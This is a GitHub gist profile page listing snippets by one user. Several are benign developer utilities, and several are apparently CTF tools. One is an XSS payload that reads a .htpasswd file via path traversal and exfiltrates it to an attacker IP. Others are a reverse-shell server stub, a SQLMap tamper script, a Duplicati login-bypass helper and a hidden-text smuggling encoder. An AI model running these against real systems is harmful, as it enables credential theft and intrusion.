Skip to content

Instantly share code, notes, and snippets.

View Wind010's full-sized avatar

Jeff Tong Wind010

7 followers · 21 following
View GitHub Profile
@Wind010
Wind010 / tamper_hmac256.py
Created April 6, 2025 21:17
SQLMap tamper script to generate HMAC-256 signature of request body and populate header
#!/usr/bin/env python
import hmac
import hashlib
import json
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
@Wind010
Wind010 / CcHelper.ps1
Created March 22, 2025 00:30
Some functions to help with Coverlet code coverage execution from CLI.
# Common useful commands
# Must be sourced first.
# . .\CcHelper.ps1
# Dependencies
# donet package add coverlet.msbuild
# dotnet tool install -g dotnet-reportgenerator-globaltool
# dotnet tool install --global coverlet.console
# Useful
@Wind010
Wind010 / variation_selector_encoder.py
Created March 17, 2025 22:08
Encoding and decoding text using Unicode variation selectors that can be used for smuggling messages.
# Based off: https://paulbutler.org/2025/smuggling-arbitrary-data-through-an-emoji/
import argparse
ENCODING = 'utf-8'
HEX_RANGE = 16
CODE_POINT_RANGE = 256 # Variation selectors
# Variation selectors block https://unicode.org/charts/nameslist/n_FE00.html
# VS1..=VS16
VARIATION_SELECTOR_START = 0xFE00
@Wind010
Wind010 / htb_badge.html
Created February 25, 2025 02:03
Customized HTML for the badge that is returned from https://www.hackthebox.com/badge
<div style="width: 220px; height:50px; background-color: #343c41; border-radius:4px; text-align: left; background-image: url(https://www.hackthebox.com/images/icon20.png); background-position: right 5px bottom 5px; background-repeat: no-repeat;">
<style scoped>@font-face {font-family: "Roboto";font-style: normal;font-weight: 400;src: url(https://fonts.gstatic.com/s/ubuntumono/v6/ViZhet7Ak-LRXZMXzuAfkY4P5ICox8Kq3LLUNMylGO4.woff2) format("woff2");}.htb_font {font-family: "Roboto", monospace;}.htb_nickname {color: #ffffff;font-size: 12px;font-weight: bold;}.htb_points {color: #56C0E0;font-size: 10px;}.htb_respect {color: #f7af3e;font-size: 10px;}.htb_ranking {color: #ffffff;font-size: 10px;}.htb_line {line-height: 12px;margin: 0px;padding: 0px;}.htb_link {color: #9acc14;font-size:0.6em;text-decoration: none;}.htb_link:hover {color: #9acc14;font-size:0.6em;text-decoration: underline;}.htb_link:visited {color: #9acc14;}.htb_rank{color: #ffffff;font-size: 11px;}.htb_row1{height:13px;}.htb_row2{height:17px;}.htb_
@Wind010
Wind010 / aoc_ui_fun.js
Last active December 11, 2024 20:55
Just some fun with the Advent of Code Leaderboard UI
function openAllDates() {
const parentElement = document.querySelector('.privboard-days');
const spans = parentElement.querySelectorAll('span');
spans.forEach(span => {
const anchor = document.createElement('a');
const dayText = span.textContent.replace(/\n/g, '');
anchor.href = `/2024/day/${dayText.replace(/<br>/g, '')}`; // Remove <br> for href
anchor.innerHTML = span.innerHTML;
@Wind010
Wind010 / git_filter_repo.ps1
Last active December 7, 2024 02:00
Remove files from git history on owned git repo. Does not rid that file history from pull requests.
pip install git-filter-repo
$filesToDelete = @("some.txt", "other.txt")
$excludeFolders = @("template")
Get-ChildItem -Path . -Recurse -File | Where-Object {
$filesToDelete.Contains($_.Name) -and
-not $excludeFolders.Contains($_.Directory.Name)
} | % { git filter-repo --path $_.FullName --invert-paths --Force }
@Wind010
Wind010 / a_foothold.sh
Created November 25, 2024 04:11
Script to automate gaining foothold information. Can be updated to enumerate via Local File Inclusion.
cat <<EOF > exploit.md
<script>
fetch("http://xxxxx.htb/messages.php?file=../../../../var/www/statistics.xxxxx.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx:8000/?data=" + btoa(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>
EOF
@Wind010
Wind010 / generate_nonced_password.js
Created August 26, 2024 20:23
Just some easier code for Duplicati Login with known NONCE and Salted Password.
const base64Decode = str => Uint8Array.from(atob(str), c => c.charCodeAt(0));
const base64Encode = bytes => btoa(String.fromCharCode(...new Uint8Array(bytes)));
const generatePassword = async (nounce, saltedPassword) => {
const bytesNounce = base64Decode(nounce);
const bytesSaltedPassword = base64Decode(saltedPassword);
const concatenatedBytes = new Uint8Array([...bytesNounce, ...bytesSaltedPassword]);
const hash = await crypto.subtle.digest('SHA-256', concatenatedBytes);
return base64Encode(hash);
};
@Wind010
Wind010 / post_server.py
Last active August 20, 2024 03:39
Reverse shell hosted by http.server for CTF
#!/usr/bin/env python
import argparse
import http.server
import socketserver
import socket
import os
import pty
class CustomRequestHandler(http.server.SimpleHTTPRequestHandler):
@Wind010
Wind010 / permutations.py
Created August 5, 2024 23:13
Create permutations of a list of objects up to n selected combined elements.
import itertools
n = 3
names = [
"Jordan", "Haig", "Emily", "Johns", "Elisa", "Maldonado", "Brandi", "Simmons", "Gerard", "Sekawa", "Shelly", "Buckle", "Alice", "Apple", "Maxis", "Stewart", "Olivia", "Johnson", "Ava", "Brown", "Sophia", "Taylor", "Amelia", "Davis", "Evelyn", "Rodriguez", "Emma", "Smith", "Charlotte", "Jones", "Mia", "Miller", "Harper", "Garcia", "Abigail", "Martinez"
]
permutations = [''.join(p) for p in itertools.product(names, repeat=n)]
[print(perm) for perm in permutations]